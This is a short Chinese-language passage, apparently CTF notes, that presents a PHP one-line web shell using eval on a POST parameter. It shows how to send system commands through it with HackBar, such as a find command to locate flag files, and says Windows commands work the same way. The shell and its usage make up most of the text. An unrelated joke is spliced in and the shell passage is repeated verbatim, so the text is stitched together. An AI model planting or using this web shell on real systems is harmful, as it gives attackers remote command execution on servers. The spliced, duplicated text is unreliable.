比如下面的一句话php
<?php @eval($_POST['shell']);?>
通过在hackbar中输入shell=system("find / -name 'flag*'");就可以查找本地flag文件(末尾带上分号;)
同样windows系统也可以执行系统命令
参考:
php一句话马的手工利用
奶奶问孙子:4+1等于几 孙子说:等于6-1。 奶奶说:你明明知道答案,为什么不说? 孙子说:年轻人不讲5的……..
比如下面的一句话php
<?php @eval($_POST['shell']);?>
通过在hackbar中输入shell=system("find / -name 'flag*'");就可以查找本地flag文件(末尾带上分号;)
同样windows系统也可以执行系统命令
参考: